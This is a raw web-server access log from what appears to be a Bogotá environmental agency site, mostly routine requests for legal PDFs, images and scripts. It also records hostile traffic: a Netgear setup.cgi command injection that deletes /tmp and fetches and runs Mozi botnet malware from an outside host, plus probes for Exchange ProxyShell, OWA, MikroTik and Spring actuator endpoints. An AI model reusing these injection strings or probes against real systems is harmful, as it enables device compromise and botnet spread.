201.245.192.253 - - [14/May/2023:14:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39823
201.245.192.253 - - [14/May/2023:14:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43817
38.32.70.140 - - [14/May/2023:14:39:37 -0500] "GET /galeria/galeria/fotos/Huemdal-el-Tunjo4P.jpg HTTP/1.1" 200 18710
172.22.2.4 - - [14/May/2023:14:37:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
201.245.192.253 - - [14/May/2023:14:39:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
200.69.81.170 - - [14/May/2023:14:40:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9638.pdf HTTP/1.1" 200 1219769
200.69.81.170 - - [14/May/2023:14:40:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.59.3.98 - - [14/May/2023:14:40:24 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.59.3.98 - - [14/May/2023:14:40:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.59.3.98 - - [14/May/2023:14:40:24 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
200.69.81.170 - - [14/May/2023:14:42:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5177.pdf HTTP/1.1" 200 245691
40.77.167.146 - - [14/May/2023:14:42:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [14/May/2023:14:42:51 -0500] "HEAD / HTTP/1.1" 200 -
200.69.81.170 - - [14/May/2023:14:43:32 -0500] "GET /bla/resoluciones/RESOLUCIONES%202009/4573.pdf HTTP/1.1" 200 3033915
172.22.2.4 - - [14/May/2023:14:43:55 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2001%20del%2012%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/May/2023:14:42:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:14:44:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:14:43:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
40.77.167.146 - - [14/May/2023:14:45:51 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
66.249.77.23 - - [14/May/2023:14:46:17 -0500] "-" 408 -
207.46.13.211 - - [14/May/2023:14:46:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3245.pdf HTTP/1.1" 304 -
66.102.8.160 - - [14/May/2023:14:47:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9638.pdf HTTP/1.1" 200 1219769
45.191.232.4 - - [14/May/2023:14:47:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9638.pdf HTTP/1.1" 200 1219769
66.102.8.191 - - [14/May/2023:14:47:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5177.pdf HTTP/1.1" 200 245691
216.245.221.92 - - [14/May/2023:14:47:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.5 - - [14/May/2023:14:49:04 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:14:49:23 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
201.245.192.253 - - [14/May/2023:14:49:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
200.69.81.170 - - [14/May/2023:14:50:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/3712.pdf HTTP/1.1" 200 933245
172.22.2.4 - - [14/May/2023:14:48:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.191.232.4 - - [14/May/2023:14:50:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5177.pdf HTTP/1.1" 200 245691
45.191.232.4 - - [14/May/2023:14:50:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5177.pdf HTTP/1.1" 206 49083
191.156.54.149 - - [14/May/2023:14:50:46 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
172.22.2.4 - - [14/May/2023:14:49:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
216.245.221.92 - - [14/May/2023:14:52:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [14/May/2023:14:54:14 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
201.245.192.253 - - [14/May/2023:14:54:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
200.69.81.170 - - [14/May/2023:14:55:52 -0500] "GET /BLA/resoluciones/Decretos/Decreto%20323%20de%202018.pdf HTTP/1.1" 200 1013088
172.22.2.4 - - [14/May/2023:14:54:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.191.232.4 - - [14/May/2023:14:56:55 -0500] "GET /bla/resoluciones/RESOLUCIONES%202009/4573.pdf HTTP/1.1" 200 3033915
45.191.232.4 - - [14/May/2023:14:56:56 -0500] "GET /bla/resoluciones/RESOLUCIONES%202009/4573.pdf HTTP/1.1" 206 19259
172.22.2.4 - - [14/May/2023:14:55:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [14/May/2023:14:57:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:14:59:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
173.252.79.1 - - [14/May/2023:15:00:37 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
66.102.8.160 - - [14/May/2023:15:01:00 -0500] "GET /bla/resoluciones/RESOLUCIONES%202009/4573.pdf HTTP/1.1" 200 3033915
173.252.111.14 - - [14/May/2023:15:01:02 -0500] "GET /semana-santa-dias-y-horarios-para-visitar-el-camino-guadalupe-aguanoso.html HTTP/1.1" 206 943
172.22.2.4 - - [14/May/2023:15:00:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:15:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:01:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
192.144.113.121 - - [14/May/2023:15:03:41 -0500] "GET /alianzas-por-la-sostenibilidad-y-la-circularidad-en-la-moda-bogotana.html HTTP/1.1" 200 800
201.245.192.253 - - [14/May/2023:15:04:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
181.59.3.160 - - [14/May/2023:15:04:58 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
181.59.3.160 - - [14/May/2023:15:04:59 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
181.59.3.160 - - [14/May/2023:15:05:00 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [14/May/2023:15:06:50 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.245.221.92 - - [14/May/2023:15:07:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:06:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:07:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
139.47.42.87 - - [14/May/2023:15:09:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [14/May/2023:15:09:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
139.47.42.87 - - [14/May/2023:15:09:35 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
139.47.42.87 - - [14/May/2023:15:09:35 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [14/May/2023:15:11:55 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 2324
172.22.2.4 - - [14/May/2023:15:11:55 -0500] "GET /BLA/boletinlegal/solr/ HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:15:11:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
172.22.2.4 - - [14/May/2023:15:12:19 -0500] "GET /BLA/boletinlegal/owa/ HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:15:12:20 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?a..foo.var/owa/?&Email=autodiscover/autodiscover.json?a..foo.var&Protocol=XYZ&FooProtocol=%50owershell HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:15:12:46 -0500] "GET /BLA/boletinlegal/webfig/ HTTP/1.1" 404 1018
216.245.221.92 - - [14/May/2023:15:12:51 -0500] "HEAD / HTTP/1.1" 200 -
200.41.119.38 - - [14/May/2023:15:13:01 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
200.41.119.38 - - [14/May/2023:15:13:01 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
200.41.119.38 - - [14/May/2023:15:13:01 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [14/May/2023:15:13:27 -0500] "GET /BLA/boletinlegal/sugar_version.json HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:15:13:43 -0500] "GET /BLA/boletinlegal/remote/login HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:15:13:44 -0500] "HEAD /BLA/boletinlegal/icons/sphere1.png HTTP/1.1" 404 -
172.22.2.4 - - [14/May/2023:15:12:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:13:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/May/2023:15:13:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [14/May/2023:15:14:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:12:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51977
40.77.167.146 - - [14/May/2023:15:14:44 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
94.102.49.193 - - [14/May/2023:15:16:26 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/May/2023:15:17:51 -0500] "HEAD / HTTP/1.1" 200 -
117.253.159.74 - - [14/May/2023:15:18:43 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.253.159.74:34557/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
201.245.192.253 - - [14/May/2023:15:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40367
201.245.192.253 - - [14/May/2023:15:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43828
201.245.192.253 - - [14/May/2023:15:19:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:17:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:18:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [14/May/2023:15:22:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.71 - - [14/May/2023:15:24:09 -0500] "-" 408 -
40.77.167.97 - - [14/May/2023:15:24:13 -0500] "GET /BLA/resoluciones/AUTOS%202022/1279.pdf HTTP/1.1" 304 -
201.245.192.253 - - [14/May/2023:15:24:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:24:39 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=1365&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 626
52.167.144.71 - - [14/May/2023:15:24:53 -0500] "GET /engativa-tendra-jornada-de-recoleccion-de-llantas-este-miercoles.html HTTP/1.1" 200 933
172.22.2.4 - - [14/May/2023:15:23:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:23:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48260
172.22.2.4 - - [14/May/2023:15:24:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51977
216.245.221.92 - - [14/May/2023:15:27:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:15:29:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40367
201.245.192.253 - - [14/May/2023:15:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43828
201.245.192.253 - - [14/May/2023:15:29:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:29:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.37 - - [14/May/2023:15:31:56 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:15:30:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [14/May/2023:15:32:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:15:34:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:33:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61759
172.22.2.4 - - [14/May/2023:15:35:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [14/May/2023:15:36:56 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [14/May/2023:15:37:05 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [14/May/2023:15:35:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:15:37:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:36:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
207.46.13.211 - - [14/May/2023:15:38:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/4685.pdf HTTP/1.1" 200 354435
201.245.192.253 - - [14/May/2023:15:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40367
201.245.192.253 - - [14/May/2023:15:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43828
201.245.192.253 - - [14/May/2023:15:39:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:40:02 -0500] "POST /BLA/boletinlegal/dns-query HTTP/1.1" 406 -
66.249.77.25 - - [14/May/2023:15:41:27 -0500] "-" 408 -
194.165.16.78 - - [14/May/2023:15:41:29 -0500] "\x03" 400 226
216.245.221.92 - - [14/May/2023:15:42:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:41:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:15:43:26 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [14/May/2023:15:42:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [14/May/2023:15:44:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:15:47:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:48:00 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5035&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1067
172.22.2.4 - - [14/May/2023:15:47:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:15:49:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:47:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
66.249.77.21 - - [14/May/2023:15:50:29 -0500] "-" 408 -
216.245.221.92 - - [14/May/2023:15:52:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:15:54:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:52:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:53:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57945
190.108.77.165 - - [14/May/2023:15:55:55 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
216.245.221.92 - - [14/May/2023:15:57:50 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:57:59 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1139
172.22.2.4 - - [14/May/2023:15:58:04 -0500] "GET /BLA/boletinlegal/actuator/health HTTP/1.1" 404 1018
201.245.192.253 - - [14/May/2023:15:59:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:15:58:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:15:59:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/May/2023:16:01:22 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [14/May/2023:16:01:23 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:27 -0500] "GET /BLA/boletinlegal/.well-known/assetlinks.json HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:27 -0500] "GET /BLA/boletinlegal/.well-known/apple-app-site-association HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/.well-known/assetlinks.json HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/.well-known/apple-app-site-association HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/.well-known/resource-that-should-not-exist-whose-status-code-should-not-be-200/ HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/.well-known/change-password HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/.well-known/gpc.json HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:28 -0500] "GET /BLA/boletinlegal/.well-known/security.txt HTTP/1.1" 404 1230
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [14/May/2023:16:01:40 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [14/May/2023:16:01:41 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [14/May/2023:16:01:42 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [14/May/2023:16:01:43 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
